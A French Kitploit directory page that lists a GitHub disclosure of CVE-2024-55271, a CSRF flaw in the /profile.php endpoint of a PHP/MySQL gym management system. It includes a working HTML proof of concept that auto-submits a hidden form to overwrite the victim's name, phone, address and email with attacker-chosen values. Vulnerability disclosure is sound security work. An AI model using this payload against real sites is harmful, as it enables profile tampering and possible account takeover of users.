Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-55271 — Système de gestion de salle de sport utilisant PHP et MYSQL | Kitploit
Outils/GitHubGitHub/shoaibalam112/cve-2024-55271
Analyse des VulnérabilitésExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubshoaibalam112/cve-2024-55271

CVE-2024-55271

Système de gestion de salle de sport utilisant PHP et MYSQL

Voir le dépôt
il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Système de gestion de salle de sport (CVE-2024-55271)

Un système de gestion de salle de sport construit avec PHP et MySQL.

Auditeur

Shoaib Alam - Profil LinkedIn

Description

Vulnérabilité CSRF dans la section de mise à jour du profil

Une vulnérabilité de type Cross-Site Request Forgery (CSRF) a été identifiée dans le système de gestion de salle de sport. Ce problème est présent dans la fonctionnalité de mise à jour du profil du panneau utilisateur.

L'application manque actuellement de l'implémentation de jetons Anti-CSRF, ce qui la rend vulnérable aux attaques de type Cross-Site Request Forgery (CSRF). Cette faiblesse de sécurité affecte spécifiquement le point de terminaison /profile.php. Un attaquant peut exploiter cette faille pour effectuer des modifications non autorisées d'informations sensibles de l'utilisateur, telles que l'adresse, le nom et le numéro de téléphone. Cela pourrait potentiellement compromettre l'intégrité des comptes utilisateur et entraîner d'autres problèmes de sécurité.

Point de terminaison vulnérable : /profile.php

Preuve de concept (PoC)

Voici une preuve de concept démontrant la vulnérabilité CSRF. Cette PoC a été générée à l'aide de Burp Suite Professional.

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/gym/profile.php" method="POST">
      <input type="hidden" name="fname" value="hacked" />
      <input type="hidden" name="lname" value="victim" />
      <input type="hidden" name="email" value="attacker&#64;gmail&#46;com" />
      <input type="hidden" name="mobile" value="9999999999" />
      <input type="hidden" name="state" value="hacked" />
      <input type="hidden" name="city" value="hacked" />
      <input type="hidden" name="address" value="hacked" />
      <input type="hidden" name="submit" value="Update" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Télécharger l’outil